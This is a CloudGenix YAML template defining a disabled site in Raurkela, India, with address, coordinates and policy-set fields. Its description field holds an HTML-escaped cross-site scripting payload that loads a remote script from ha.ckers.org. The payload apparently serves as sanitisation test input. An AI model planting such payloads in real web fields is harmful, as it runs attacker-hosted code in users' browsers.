---
type: cloudgenix template
version: 1.0
# Created at 2020-10-05T12:24:33.533095Z
# by system_2750@soumyars.com
sites v4.5:
  RAURKELA_SITE:
    address:
      city: Raurkela
      country: India
      post_code:
      state:
      street:
      street2:
    admin_state: disabled
    description: '&lt;SCRIPT&gt;document.write("&lt;SCRIPT&gt;");&lt;/SCRIPT&gt;PT
      SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;'
    element_cluster_role: SPOKE
    elements v2.3: {}
    extended_tags:
    location:
      description:
      latitude: 22.23040008544922
      longitude: 84.83000183105469
    nat_policysetstack_id: Default-NATPolicySetStack
    network_policysetstack_id: NetworkPolicySetStack
    policy_set_id:
    priority_policysetstack_id: PriorityPolicySetStack
    security_policyset_id:
    service_binding: Preset Domain
    tags:
